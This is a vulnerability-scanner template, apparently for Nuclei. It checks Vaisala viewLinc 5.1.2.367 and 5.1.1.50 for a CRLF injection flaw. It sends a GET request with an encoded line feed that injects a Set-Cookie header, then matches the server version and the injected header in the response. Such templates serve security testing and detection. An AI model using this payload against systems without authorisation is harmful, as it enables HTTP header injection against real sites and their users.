id: viewlinc-crlf-injection

info:
  name: viewLinc 5.1.2.367 - Carriage Return Line Feed Attack
  author: geeknik
  severity: low
  description: viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned.
  reference:
    - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
  metadata:
    max-request: 1
  tags: crlf,viewlinc

http:
  - method: GET
    path:
      - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "Server: viewLinc/5.1.2.367"
          - "Set-Cookie: crlfinjection=crlfinjection"
        part: header
        condition: and

      - type: word
        words:
          - "Server: viewLinc/5.1.1.50"
          - "Set-Cookie: crlfinjection=crlfinjection"
        part: header
        condition: and

# digest: 490a0046304402201764ef690df9eaa529b562b4bad4854d446ef3c9a2088f7f178d9af610a426de022044f9d589a619c553e84bd7431057eaa4455c7b4a66fb2fb894b240b5e307973b:922c64590222798bb761d5b6d8e72950
